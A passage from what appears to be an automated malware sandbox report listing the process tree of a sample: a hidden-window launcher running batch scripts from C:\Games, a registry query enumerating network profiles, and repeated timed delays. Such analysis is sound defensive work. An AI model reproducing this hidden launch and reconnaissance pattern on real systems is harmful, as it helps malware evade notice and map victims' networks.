                      Commandline:C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
                      Imagebase:0x610000
                      File size:412'832 bytes
                      MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:44
                      Start time:12:18:20
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 20
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:45
                      Start time:12:18:20
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:46
                      Start time:12:18:20
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:47
                      Start time:12:18:20
                      Start date:23/01/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:48
                      Start time:12:18:20
                      Start date:23/01/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:49
                      Start time:12:18:20
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:50
                      Start time:12:18:21
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:51
                      Start time:12:18:21
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\reg.exe
                      Wow64 process (32bit):true
                      Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                      Imagebase:0xbc0000
                      File size:59'392 bytes
                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:54
                      Start time:12:18:40
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 20
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:55
                      Start time:12:19:00
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 20
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:56
                      Start time:12:19:20
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 20
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:58
                      Start time:12:19:41
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 20
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      No disassembly